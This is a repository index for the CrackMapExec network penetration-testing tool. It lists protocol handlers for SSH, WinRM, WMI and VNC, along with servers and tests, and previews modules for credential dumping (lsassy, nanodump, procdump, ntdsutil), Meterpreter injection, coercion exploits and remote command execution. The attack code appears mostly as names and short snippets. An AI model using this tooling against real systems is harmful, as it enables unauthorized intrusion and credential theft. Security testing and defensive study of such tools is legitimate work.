method check_if_admin (line 69) | def check_if_admin(self):
method plaintext_login (line 83) | def plaintext_login(self, username, password, private_key=None):
method execute (line 176) | def execute(self, payload=None, output=False):
FILE: cme/protocols/ssh/database.py
class database (line 25) | class database:
method __init__ (line 26) | def __init__(self, db_engine):
method db_schema (line 44) | def db_schema(db_conn):
method reflect_tables (line 81) | def reflect_tables(self):
method shutdown_db (line 99) | def shutdown_db(self):
method clear_database (line 108) | def clear_database(self):
method add_host (line 112) | def add_host(self, host, port, banner, os=None):
method add_credential (line 164) | def add_credential(self, credtype, username, password, key=None):
method remove_credentials (line 231) | def remove_credentials(self, creds_id):
method add_key (line 241) | def add_key(self, cred_id, key):
method get_keys (line 255) | def get_keys(self, key_id=None, cred_id=None):
method add_admin_user (line 264) | def add_admin_user(self, credtype, username, secret, host_id=None, cre...
method get_admin_relations (line 298) | def get_admin_relations(self, cred_id=None, host_id=None):
method remove_admin_relation (line 309) | def remove_admin_relation(self, cred_ids=None, host_ids=None):
method is_credential_valid (line 319) | def is_credential_valid(self, credential_id):
method get_credentials (line 330) | def get_credentials(self, filter_term=None, cred_type=None):
method get_credential (line 350) | def get_credential(self, cred_type, username, password):
method is_host_valid (line 362) | def is_host_valid(self, host_id):
method get_hosts (line 370) | def get_hosts(self, filter_term=None):
method is_user_valid (line 390) | def is_user_valid(self, cred_id):
method get_users (line 398) | def get_users(self, filter_term=None):
method get_user (line 410) | def get_user(self, domain, username):
method add_loggedin_relation (line 415) | def add_loggedin_relation(self, cred_id, host_id, shell=False):
method get_loggedin_relations (line 437) | def get_loggedin_relations(self, cred_id=None, host_id=None, shell=None):
method remove_loggedin_relations (line 448) | def remove_loggedin_relations(self, cred_id=None, host_id=None):
FILE: cme/protocols/ssh/db_navigator.py
class navigator (line 7) | class navigator(DatabaseNavigator):
method display_creds (line 8) | def display_creds(self, creds):
method display_hosts (line 45) | def display_hosts(self, hosts):
method do_hosts (line 70) | def do_hosts(self, line):
method help_hosts (line 140) | def help_hosts(self):
method do_creds (line 149) | def do_creds(self, line):
method help_creds (line 242) | def help_creds(self):
method display_keys (line 261) | def display_keys(self, keys):
method do_keys (line 267) | def do_keys(self, line):
method help_keys (line 282) | def help_keys(self):
method do_clear_database (line 289) | def do_clear_database(self, line):
method help_clear_database (line 293) | def help_clear_database(self):
method complete_hosts (line 302) | def complete_hosts(self, text, line):
method complete_creds (line 312) | def complete_creds(self, text, line):
FILE: cme/protocols/ssh/proto_args.py
function proto_args (line 1) | def proto_args(parser, std_parser, module_parser):
FILE: cme/protocols/vnc.py
class vnc (line 20) | class vnc(connection):
method __init__ (line 21) | def __init__(self, args, db, host):
method proto_flow (line 31) | def proto_flow(self):
method proto_logger (line 41) | def proto_logger(self):
method print_host_info (line 51) | def print_host_info(self):
method create_conn_obj (line 54) | def create_conn_obj(self):
method connect_vnc (line 66) | async def connect_vnc(self, discover=False):
method plaintext_login (line 74) | def plaintext_login(self, username, password):
method screen (line 109) | async def screen(self):
method screenshot (line 119) | def screenshot(self):
FILE: cme/protocols/vnc/database.py
class database (line 21) | class database:
method __init__ (line 22) | def __init__(self, db_engine):
method db_schema (line 38) | def db_schema(db_conn):
method reflect_tables (line 58) | def reflect_tables(self):
method shutdown_db (line 73) | def shutdown_db(self):
method clear_database (line 82) | def clear_database(self):
FILE: cme/protocols/vnc/db_navigator.py
class navigator (line 7) | class navigator(DatabaseNavigator):
method do_clear_database (line 8) | def do_clear_database(self, line):
method help_clear_database (line 12) | def help_clear_database(self):
FILE: cme/protocols/vnc/proto_args.py
function proto_args (line 1) | def proto_args(parser, std_parser, module_parser):
FILE: cme/protocols/winrm.py
class winrm (line 21) | class winrm(connection):
method __init__ (line 22) | def __init__(self, args, db, host):
method proto_logger (line 34) | def proto_logger(self):
method enum_host_info (line 44) | def enum_host_info(self):
method laps_search (line 96) | def laps_search(self, username, password, ntlm_hash, domain):
method print_host_info (line 185) | def print_host_info(self):
method create_conn_obj (line 199) | def create_conn_obj(self):
method plaintext_login (line 225) | def plaintext_login(self, domain, username, password):
method hash_login (line 287) | def hash_login(self, domain, username, ntlm_hash):
method execute (line 358) | def execute(self, payload=None, get_output=False):
method ps_execute (line 370) | def ps_execute(self, payload=None, get_output=False):
method sam (line 377) | def sam(self):
method lsa (line 394) | def lsa(self):
FILE: cme/protocols/winrm/database.py
class database (line 16) | class database:
method __init__ (line 17) | def __init__(self, db_engine):
method db_schema (line 35) | def db_schema(db_conn):
method reflect_tables (line 76) | def reflect_tables(self):
method shutdown_db (line 93) | def shutdown_db(self):
method clear_database (line 102) | def clear_database(self):
method add_host (line 106) | def add_host(self, ip, port, hostname, domain, os=None):
method add_credential (line 154) | def add_credential(self, credtype, domain, username, password, pillage...
method remove_credentials (line 217) | def remove_credentials(self, creds_id):
method add_admin_user (line 227) | def add_admin_user(self, credtype, domain, username, password, host, u...
method get_admin_relations (line 262) | def get_admin_relations(self, user_id=None, host_id=None):
method remove_admin_relation (line 273) | def remove_admin_relation(self, user_ids=None, host_ids=None):
method is_credential_valid (line 283) | def is_credential_valid(self, credential_id):
method get_credentials (line 294) | def get_credentials(self, filter_term=None, cred_type=None):
method is_credential_local (line 314) | def is_credential_local(self, credential_id):
method is_host_valid (line 324) | def is_host_valid(self, host_id):
method get_hosts (line 332) | def get_hosts(self, filter_term=None):
method is_user_valid (line 357) | def is_user_valid(self, user_id):
method get_users (line 365) | def get_users(self, filter_term=None):
method get_user (line 377) | def get_user(self, domain, username):
method add_loggedin_relation (line 385) | def add_loggedin_relation(self, user_id, host_id):
method get_loggedin_relations (line 404) | def get_loggedin_relations(self, user_id=None, host_id=None):
method remove_loggedin_relations (line 413) | def remove_loggedin_relations(self, user_id=None, host_id=None):
FILE: cme/protocols/winrm/db_navigator.py
class navigator (line 8) | class navigator(DatabaseNavigator):
method display_creds (line 9) | def display_creds(self, creds):
method display_hosts (line 33) | def display_hosts(self, hosts):
method do_hosts (line 62) | def do_hosts(self, line):
method help_hosts (line 111) | def help_hosts(self):
method do_creds (line 126) | def do_creds(self, line):
method help_creds (line 206) | def help_creds(self):
method do_clear_database (line 226) | def do_clear_database(self, line):
method help_clear_database (line 230) | def help_clear_database(self):
FILE: cme/protocols/winrm/proto_args.py
function proto_args (line 3) | def proto_args(parser, std_parser, module_parser):
function get_conditional_action (line 36) | def get_conditional_action(baseAction):
FILE: cme/protocols/wmi.py
class wmi (line 22) | class wmi(connection):
method __init__ (line 24) | def __init__(self, args, db, host):
method proto_logger (line 53) | def proto_logger(self):
method create_conn_obj (line 59) | def create_conn_obj(self):
method enum_host_info (line 79) | def enum_host_info(self):
method print_host_info (line 156) | def print_host_info(self):
method check_if_admin (line 164) | def check_if_admin(self):
method kerberos_login (line 199) | def kerberos_login(self, domain, username, password="", ntlm_hash="", ...
method plaintext_login (line 283) | def plaintext_login(self, domain, username, password):
method hash_login (line 329) | def hash_login(self, domain, username, ntlm_hash):
method wmi (line 386) | def wmi(self, WQL=None, namespace=None):
method execute (line 427) | def execute(self, command=None, get_output=False):
FILE: cme/protocols/wmi/database.py
class database (line 15) | class database:
method __init__ (line 16) | def __init__(self, db_engine):
method db_schema (line 32) | def db_schema(db_conn):
method reflect_tables (line 50) | def reflect_tables(self):
method shutdown_db (line 65) | def shutdown_db(self):
method clear_database (line 74) | def clear_database(self):
FILE: cme/protocols/wmi/db_navigator.py
class navigator (line 7) | class navigator(DatabaseNavigator):
method do_clear_database (line 8) | def do_clear_database(self, line):
method help_clear_database (line 12) | def help_clear_database(self):
FILE: cme/protocols/wmi/proto_args.py
function proto_args (line 3) | def proto_args(parser, std_parser, module_parser):
function get_conditional_action (line 35) | def get_conditional_action(baseAction):
FILE: cme/protocols/wmi/wmiexec.py
class WMIEXEC (line 36) | class WMIEXEC:
method __init__ (line 37) | def __init__(self, host, username, password, domain, lmhash, nthash, d...
method execute (line 66) | def execute(self, command, output=False):
method execute_remote (line 78) | def execute_remote(self, command):
method execute_WithOutput (line 85) | def execute_WithOutput(self, command):
method queryRegistry (line 99) | def queryRegistry(self, keyName):
FILE: cme/protocols/wmi/wmiexec_event.py
class WMIEXEC_EVENT (line 39) | class WMIEXEC_EVENT:
method __init__ (line 40) | def __init__(self, host, username, password, domain, lmhash, nthash, d...
method execute (line 65) | def execute(self, command, output=False):
method execute_remote (line 74) | def execute_remote(self, command):
method execute_handler (line 81) | def execute_handler(self, command):
method process_vbs (line 96) | def process_vbs(self, command):
method checkError (line 120) | def checkError(self, banner, call_status):
method execute_vbs (line 130) | def execute_vbs(self, vbs_content):
method get_CommandResult (line 187) | def get_CommandResult(self):
method remove_Instance (line 195) | def remove_Instance(self):
FILE: cme/servers/http.py
class RequestHandler (line 15) | class RequestHandler(BaseHTTPRequestHandler):
method log_message (line 16) | def log_message(self, format, *args):
method do_GET (line 25) | def do_GET(self):
method do_POST (line 36) | def do_POST(self):
method stop_tracking_host (line 47) | def stop_tracking_host(self):
class CMEServer (line 59) | class CMEServer(threading.Thread):
method __init__ (line 60) | def __init__(self, module, context, logger, srv_host, port, server_typ...
method base_server (line 85) | def base_server(self):
method track_host (line 88) | def track_host(self, host_ip):
method run (line 91) | def run(self):
method shutdown (line 97) | def shutdown(self):
FILE: cme/servers/smb.py
class CMESMBServer (line 10) | class CMESMBServer(threading.Thread):
method __init__ (line 11) | def __init__(
method addShare (line 36) | def addShare(self, share_name, share_path):
method run (line 39) | def run(self):
method shutdown (line 45) | def shutdown(self):
FILE: tests/e2e_test.py
function get_cli_args (line 7) | def get_cli_args():
function generate_commands (line 38) | def generate_commands(args):
function run_e2e_tests (line 59) | def run_e2e_tests(args):
FILE: tests/test_smb_database.py
function db_engine (line 18) | def db_engine():
function db_setup (line 26) | def db_setup(db_engine):
function db (line 46) | def db(db_setup):
function sess (line 52) | def sess(db_engine):
function test_add_host (line 60) | def test_add_host(db):
function test_update_host (line 88) | def test_update_host(db, sess):
function test_add_credential (line 130) | def test_add_credential():
function test_update_credential (line 134) | def test_update_credential():
function test_remove_credential (line 138) | def test_remove_credential():
function test_add_admin_user (line 142) | def test_add_admin_user():
function test_get_admin_relations (line 146) | def test_get_admin_relations():
function test_remove_admin_relation (line 150) | def test_remove_admin_relation():
function test_is_credential_valid (line 154) | def test_is_credential_valid():
function test_get_credentials (line 158) | def test_get_credentials():
function test_get_credential (line 162) | def test_get_credential():
function test_is_credential_local (line 166) | def test_is_credential_local():
function test_is_host_valid (line 170) | def test_is_host_valid():
function test_get_hosts (line 174) | def test_get_hosts():
function test_is_group_valid (line 178) | def test_is_group_valid():
function test_add_group (line 182) | def test_add_group():
function test_get_groups (line 186) | def test_get_groups():
function test_get_group_relations (line 190) | def test_get_group_relations():
function test_remove_group_relations (line 194) | def test_remove_group_relations():
function test_is_user_valid (line 198) | def test_is_user_valid():
function test_get_users (line 202) | def test_get_users():
function test_get_user (line 206) | def test_get_user():
function test_get_domain_controllers (line 210) | def test_get_domain_controllers():
function test_is_share_valid (line 214) | def test_is_share_valid():
function test_add_share (line 218) | def test_add_share():
function test_get_shares (line 222) | def test_get_shares():
function test_get_shares_by_access (line 226) | def test_get_shares_by_access():
function test_get_users_with_share_access (line 230) | def test_get_users_with_share_access():
function test_add_domain_backupkey (line 234) | def test_add_domain_backupkey():
function test_get_domain_backupkey (line 238) | def test_get_domain_backupkey():
function test_is_dpapi_secret_valid (line 242) | def test_is_dpapi_secret_valid():
function test_add_dpapi_secrets (line 246) | def test_add_dpapi_secrets():
function test_get_dpapi_secrets (line 250) | def test_get_dpapi_secrets():
function test_add_loggedin_relation (line 254) | def test_add_loggedin_relation():
function test_get_loggedin_relations (line 258) | def test_get_loggedin_relations():
function test_remove_loggedin_relations (line 262) | def test_remove_loggedin_relations():
Condensed preview — 194 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (3,132K chars).
[
{
"path": ".dockerignore",
"chars": 855,
"preview": "tests\nDockerfile\n*.pyc\n*.pyo\n*.pyd\n__pycache__\n.vscode\n.venv\n.github\nbuild\nbin\ndist\n*.egg-info\ncme/data/powersploit/Reco"
},
{
"path": ".github/ISSUE_TEMPLATE/bug_report.md",
"chars": 1038,
"preview": "---\nname: Bug report\nabout: Create a report to help us improve\ntitle: ''\nlabels: ''\nassignees: ''\n\n---\n\n**Describe the b"
},
{
"path": ".github/workflows/crackmapexec-test.yml",
"chars": 898,
"preview": "name: CrackMapExec Tests\n\non:\n workflow_dispatch:\n push:\n branches: [ master ]\n pull_request:\n branches: [ mast"
},
{
"path": ".github/workflows/crackmapexec.yml",
"chars": 1062,
"preview": "name: CrackMapExec Tests & Build\n\non:\n workflow_dispatch:\n branches: [ main ]\n push:\n branches: [ main ]\n pull_"
},
{
"path": ".gitignore",
"chars": 771,
"preview": "data/cme.db\n*.bak\n*.log\n.venv\n.vscode\n.idea\n# Byte-compiled / optimized / DLL files\n__pycache__/\n*.py[cod]\nbin/\n\n\n# C ex"
},
{
"path": ".gitmodules",
"chars": 0,
"preview": ""
},
{
"path": "Dockerfile",
"chars": 485,
"preview": "FROM python:3.11-slim\n\nENV LANG=C.UTF-8\nENV LC_ALL=C.UTF-8\nENV PIP_NO_CACHE_DIR=off\n\nWORKDIR /usr/src/crackmapexec\n\nRUN "
},
{
"path": "LICENSE",
"chars": 1305,
"preview": "Copyright (c) 2022, byt3bl33d3r, mpgn_x64\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with "
},
{
"path": "Makefile",
"chars": 560,
"preview": ".PHONY: tests\n\ndefault: build\n\nclean:\n\trm -f -r build/\n\trm -f -r bin/\n\trm -f -r dist/\n\tfind . -name '*.pyc' -exec rm -f "
},
{
"path": "README.md",
"chars": 1955,
"preview": "# No Longer Maintained\n\nThis project is no longer mantained due to the existence of a hostile fork.\n\n# CrackMapExec\n\n<p "
},
{
"path": "build_collector.py",
"chars": 2181,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport shutil\nimport subprocess\nimport sys\nimport time\nfrom da"
},
{
"path": "cme/.hooks/hook-lsassy.py",
"chars": 152,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom PyInstaller.utils.hooks import collect_all\n\ndatas, binaries, hidden"
},
{
"path": "cme/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "cme/cli.py",
"chars": 7540,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport argparse\nimport sys\nfrom argparse import RawTextHelpFormatter\nfro"
},
{
"path": "cme/cmedb.py",
"chars": 22407,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport cmd\nimport configparser\nimport csv\nimport os\nfrom os import listd"
},
{
"path": "cme/config.py",
"chars": 2147,
"preview": "# coding=utf-8\nimport os\nfrom os.path import join as path_join\nimport configparser\nfrom cme.paths import CME_PATH, DATA_"
},
{
"path": "cme/connection.py",
"chars": 17680,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport random\nimport socket\nfrom socket import AF_INET, AF_INET6, SOCK_D"
},
{
"path": "cme/console.py",
"chars": 84,
"preview": "from rich.console import Console\n\ncme_console = Console(soft_wrap=True, tab_size=4)\n"
},
{
"path": "cme/context.py",
"chars": 532,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport configparser\nimport os\n\n\nclass Context:\n def __init__(self, db"
},
{
"path": "cme/crackmapexec.py",
"chars": 11317,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom cme.helpers.logger import highlight\nfrom cme.helpers.misc import ide"
},
{
"path": "cme/data/cme.conf",
"chars": 458,
"preview": "[CME]\nworkspace = default\nlast_used_db = smb\npwn3d_label = Pwn3d!\naudit_mode = \nreveal_chars_of_pwd = 0\nlog_mode = False"
},
{
"path": "cme/data/default.pem",
"chars": 2844,
"preview": "-----BEGIN PRIVATE KEY-----\r\nMIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDLRxCDVVXmjcFW\r\nrvuwIZh6ywLNtffsTFQ2QAykU"
},
{
"path": "cme/data/keepass_trigger_module/AddKeePassTrigger.ps1",
"chars": 1659,
"preview": "$ExportPath = \"REPLACE_ME_ExportPath\"\n$ExportName = \"REPLACE_ME_ExportName\"\n$TriggerName = \"REPLACE_ME_TriggerName\"\n$Kee"
},
{
"path": "cme/data/keepass_trigger_module/RemoveKeePassTrigger.ps1",
"chars": 772,
"preview": "$KeePassXMLPath = \"REPLACE_ME_KeePassXMLPath\"\n$TriggerName = \"REPLACE_ME_TriggerName\"\nif($KeePassXMLPath -and ($KeePassX"
},
{
"path": "cme/data/keepass_trigger_module/RestartKeePass.ps1",
"chars": 401,
"preview": "$KeePassUser = \"REPLACE_ME_KeePassUser\"\n$KeePassBinaryPath = \"REPLACE_ME_KeePassBinaryPath\"\n$DummyServiceName = \"REPLACE"
},
{
"path": "cme/data/msol_dump/msol_dump.ps1",
"chars": 2859,
"preview": "$sqlbin=@(Get-ChildItem -Path C:\\\"Program Files\"\\\"Microsoft SQL Server\"\\ -Filter sqllocaldb.exe -Recurse).fullname\n$db=@"
},
{
"path": "cme/data/veeam_dump_module/veeam_dump_mssql.ps1",
"chars": 1565,
"preview": "$SqlDatabaseName = \"REPLACE_ME_SqlDatabase\"\n$SqlServerName = \"REPLACE_ME_SqlServer\"\n$SqlInstanceName = \"REPLACE_ME_SqlIn"
},
{
"path": "cme/data/veeam_dump_module/veeam_dump_postgresql.ps1",
"chars": 969,
"preview": "$PostgreSqlExec = \"REPLACE_ME_PostgreSqlExec\"\n$PostgresUserForWindowsAuth = \"REPLACE_ME_PostgresUserForWindowsAuth\"\n$Sql"
},
{
"path": "cme/data/wmiexec_event_vbscripts/Exec_Command_Silent.vbs",
"chars": 1763,
"preview": "Dim command\ncommand = Base64StringDecode(\"REPLACE_ME_BASE64_COMMAND\")\n\nConst TriggerTypeDaily = 1\nConst ActionTypeExec ="
},
{
"path": "cme/data/wmiexec_event_vbscripts/Exec_Command_WithOutput.vbs",
"chars": 3578,
"preview": "Dim command, outputPath\ncommand = Base64StringDecode(\"REPLACE_ME_BASE64_COMMAND\")\noutputPath = \"C:\\Windows\\Temp\\REPLACE_"
},
{
"path": "cme/first_run.py",
"chars": 2085,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom os import mkdir\nfrom os.path import exists\nfrom os.path import join"
},
{
"path": "cme/helpers/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "cme/helpers/bash.py",
"chars": 203,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport os\nfrom cme.paths import DATA_PATH\n\n\ndef get_script(path):\n wit"
},
{
"path": "cme/helpers/bloodhound.py",
"chars": 2441,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\ndef add_user_bh(user, domain, logger, config):\n users_owned = []\n "
},
{
"path": "cme/helpers/http.py",
"chars": 1375,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport random\n\n\ndef get_desktop_uagent(uagent=None):\n desktop_uagents"
},
{
"path": "cme/helpers/logger.py",
"chars": 493,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nfrom termcolor import colored\n\n\ndef write_log(data, log_name):"
},
{
"path": "cme/helpers/misc.py",
"chars": 2671,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport random\nimport string\nimport re\nimport inspect\nimport os\n\n\ndef ide"
},
{
"path": "cme/helpers/msada_guids.py",
"chars": 125831,
"preview": "\"\"\"\nImpacket - Collection of Python classes for working with network protocols.\n\nSECUREAUTH LABS. Copyright (C) 2020 Sec"
},
{
"path": "cme/helpers/powershell.py",
"chars": 20167,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport os\nimport re\nfrom sys import exit\nfrom string import ascii_lowerca"
},
{
"path": "cme/loaders/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "cme/loaders/moduleloader.py",
"chars": 5505,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport cme\nimport importlib\nimport traceback\nimport sys\n\nfrom os import "
},
{
"path": "cme/loaders/protocolloader.py",
"chars": 1737,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom types import ModuleType\nfrom importlib.machinery import SourceFileLo"
},
{
"path": "cme/logger.py",
"chars": 7937,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport logging\nfrom logging import LogRecord\nfrom logging.handlers import"
},
{
"path": "cme/modules/IOXIDResolver.py",
"chars": 1566,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Credit to https://airbus-cyber-security.com/fr/the-oxid-resolver-part-"
},
{
"path": "cme/modules/MachineAccountQuota.py",
"chars": 904,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nclass CMEModule:\n \"\"\"\n Module by Shutdown and Podalirius\n\n Ini"
},
{
"path": "cme/modules/adcs.py",
"chars": 5559,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport re\nfrom impacket.ldap import ldap, ldapasn1\nfrom impacket.ldap.lda"
},
{
"path": "cme/modules/add_computer.py",
"chars": 15310,
"preview": "#!/usr/bin/env python3\n\n# -*- coding: utf-8 -*-\n\nimport ldap3\nfrom impacket.dcerpc.v5 import samr, epm, transport\n\nclass"
},
{
"path": "cme/modules/appcmd.py",
"chars": 2868,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nclass CMEModule:\n\n \"\"\"\n Checks for credentials in IIS Application P"
},
{
"path": "cme/modules/bh_owned.py",
"chars": 3378,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Author:\n# Romain Bentz (pixis - @hackanddo)\n# Website:\n# https://beta"
},
{
"path": "cme/modules/daclread.py",
"chars": 29877,
"preview": "import binascii\nimport codecs\nimport json\nimport re\nimport datetime\nfrom enum import Enum\nfrom impacket.ldap import ldap"
},
{
"path": "cme/modules/dfscoerce.py",
"chars": 5273,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom impacket import system_errors\nfrom impacket.dcerpc.v5 import transp"
},
{
"path": "cme/modules/drop-sc.py",
"chars": 4233,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport ntpath\n\n\nclass CMEModule:\n \"\"\"\n Technique discovered by @DT"
},
{
"path": "cme/modules/empire_exec.py",
"chars": 5647,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport sys\nimport requests\nfrom requests import ConnectionError\n\n# The f"
},
{
"path": "cme/modules/enum_av.py",
"chars": 20313,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# All credit to @an0n_r0\n# project : https://github.com/tothi/serviceDet"
},
{
"path": "cme/modules/enum_dns.py",
"chars": 2719,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom datetime import datetime\nfrom cme.helpers.logger import write_log\n\n"
},
{
"path": "cme/modules/example_module.py",
"chars": 3280,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nclass CMEModule:\n \"\"\"\n Example\n Module by @yomama\n \"\"\"\n\n "
},
{
"path": "cme/modules/find-computer.py",
"chars": 3488,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport socket\nimport sys\n\nclass CMEModule:\n '''\n Module by CyberC"
},
{
"path": "cme/modules/firefox.py",
"chars": 2194,
"preview": "#!/usr/bin/env python3\nfrom dploot.lib.target import Target\nfrom cme.protocols.smb.firefox import FirefoxTriage\n\n\nclass "
},
{
"path": "cme/modules/get-desc-users.py",
"chars": 5296,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom impacket.ldap import ldapasn1 as ldapasn1_impacket\nfrom impacket.ld"
},
{
"path": "cme/modules/get_netconnections.py",
"chars": 1251,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom datetime import datetime\nfrom cme.helpers.logger import write_log\ni"
},
{
"path": "cme/modules/gpp_autologin.py",
"chars": 2396,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport xml.etree.ElementTree as ET\nfrom io import BytesIO\n\n\nclass CMEMod"
},
{
"path": "cme/modules/gpp_password.py",
"chars": 4738,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport xml.etree.ElementTree as ET\nfrom Cryptodome.Cipher import AES\nfro"
},
{
"path": "cme/modules/group_members.py",
"chars": 4193,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom impacket.ldap import ldapasn1 as ldapasn1_impacket\n\nclass CMEModule"
},
{
"path": "cme/modules/groupmembership.py",
"chars": 4382,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom impacket.ldap import ldapasn1 as ldapasn1_impacket\nfrom impacket.ld"
},
{
"path": "cme/modules/handlekatz.py",
"chars": 90035,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# handlekatz module for CME python3\n# author of the module : github.com/"
},
{
"path": "cme/modules/hash_spider.py",
"chars": 14663,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Author: Peter Gormington (@hackerm00n on Twitter)\nimport logging\nfrom s"
},
{
"path": "cme/modules/impersonate.py",
"chars": 181744,
"preview": "# Impersonate module for CME \n# Author of the module : https://twitter.com/Defte_\n# Impersonate: https://github.com/sens"
},
{
"path": "cme/modules/install_elevated.py",
"chars": 3136,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom impacket.dcerpc.v5 import rrp\nfrom impacket.dcerpc.v5 import scmr\nf"
},
{
"path": "cme/modules/keepass_discover.py",
"chars": 4078,
"preview": "from csv import reader\n\n\nclass CMEModule:\n \"\"\"\n Search for KeePass-related files and process\n\n Module by @d3lb3"
},
{
"path": "cme/modules/keepass_trigger.py",
"chars": 24307,
"preview": "import os\nimport sys\nimport json\nfrom xmltodict import parse\nfrom time import sleep\nfrom csv import reader\nfrom base64 i"
},
{
"path": "cme/modules/laps.py",
"chars": 3657,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport json\n\nfrom impacket.ldap import ldapasn1 as ldapasn1_impacket\nfrom"
},
{
"path": "cme/modules/ldap-checker.py",
"chars": 8868,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport socket\nimport ssl\nimport asyncio\n\nfrom msldap.connection import MS"
},
{
"path": "cme/modules/lsassy_dump.py",
"chars": 6151,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Author:\n# Romain Bentz (pixis - @hackanddo)\n# Website:\n# https://beta"
},
{
"path": "cme/modules/masky.py",
"chars": 4373,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom masky import Masky\nfrom cme.helpers.bloodhound import add_user_bh\n\n"
},
{
"path": "cme/modules/met_inject.py",
"chars": 3440,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom sys import exit\n\n\nclass CMEModule:\n \"\"\"\n Downloads the Meterp"
},
{
"path": "cme/modules/ms17-010.py",
"chars": 8361,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# All credits to https://github.com/d4t4s3c/Win7Blue\n# @d4t4s3c\n# Module "
},
{
"path": "cme/modules/msol.py",
"chars": 3349,
"preview": "# MSOL module for CME\n# Author of the module : https://twitter.com/Daahtk\n# Based on the article : https://blog.xpnsec.c"
},
{
"path": "cme/modules/mssql_priv.py",
"chars": 11341,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Author:\n# Romain de Reydellet (@pentest_soka)\n\n\nfrom cme.helpers.logge"
},
{
"path": "cme/modules/nanodump.py",
"chars": 223078,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# nanodump module for CME python3\n# author of the module : github.com/mpg"
},
{
"path": "cme/modules/nopac.py",
"chars": 2100,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Credit to https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisatio"
},
{
"path": "cme/modules/ntdsutil.py",
"chars": 7671,
"preview": "import os\nimport shutil\nimport tempfile\nimport time\n\nfrom impacket.examples.secretsdump import LocalOperations, NTDSHash"
},
{
"path": "cme/modules/ntlmv1.py",
"chars": 2048,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom impacket.dcerpc.v5 import rrp\nfrom impacket.examples.secretsdump im"
},
{
"path": "cme/modules/petitpotam.py",
"chars": 9253,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# From https://github.com/topotam/PetitPotam\n# All credit to @topotam\n# M"
},
{
"path": "cme/modules/pi.py",
"chars": 373229,
"preview": "from base64 import b64decode\nfrom sys import exit\nfrom os import path\n\nclass CMEModule:\n\n name = \"pi\"\n description"
},
{
"path": "cme/modules/printnightmare.py",
"chars": 10124,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport sys\nfrom impacket import system_errors\nfrom impacket.dcerpc.v5.rp"
},
{
"path": "cme/modules/procdump.py",
"chars": 875950,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# prdocdump module for CME python3\n# author: github.com/mpgn\n# thanks to "
},
{
"path": "cme/modules/pso.py",
"chars": 4000,
